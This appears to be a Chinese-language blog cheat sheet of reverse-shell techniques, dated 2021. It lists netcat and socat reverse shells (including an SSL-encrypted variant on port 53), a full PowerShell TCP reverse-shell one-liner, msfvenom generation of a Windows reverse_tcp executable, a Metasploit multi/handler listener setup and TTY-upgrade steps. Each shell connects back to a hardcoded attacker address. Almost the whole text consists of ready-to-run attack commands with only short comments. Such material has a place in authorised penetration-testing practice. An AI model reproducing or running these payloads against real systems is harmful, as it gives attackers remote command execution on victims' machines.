netcat 反向shell

nc -lvnp 9999 # 攻击
 mkfifo /tmp/f; nc 192.168.1.2 9999 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f # 被攻击
 # 监听成功之后
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 export TERM=xterm
 Ctrl + Z 挂起程序
 # 唤醒 shell
 stty raw -echo; fg```## socat

socat 反向shell

socat TCP-L:9999 - # 攻击监听
socat TCP:192.168.1.2:9999 EXEC:powershell.exe,pipes # windos 执行
shellsocat TCP:192.168.1.2:9999 EXEC:"bash -li" # linux

socat ssl加密反向shell

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
socat OPENSSL-LISTEN:53,cert=shell.pem,verify=0 - # 监听53端口
socat OPENSSL:192.168.1.2:53,verify=0 EXEC:/bin/bash # linux 执行shell

通用的payloads介绍

linux

mkfifo /tmp/f; nc -lvnp  < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

windows

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

payloads github项目

[](PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings (github.com))

msfvenom payloads生成模块

msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=192.168.1.2 LPORT=9999

# / 分割代表 Staged payloads - 分割 stagless payloads 
# Staged payloads  指的是shell隐藏在正常的程序当中,不容易被发现
# stagless payloads 是直接运行payloads 容易被检测到

Metasploit multi/handler payloads生成模块

msfconsole
use multi/handler
set PAYLOAD windows/x64/shell/reverse_tcp 
set LHOST 192.168.1.2
set LPORT 9999
exploit -j

WebShells

  • kali 自带usr/share/webshells
最后修改:2021 年 09 月 12 日
如果觉得我的文章对你有用,请随意赞赏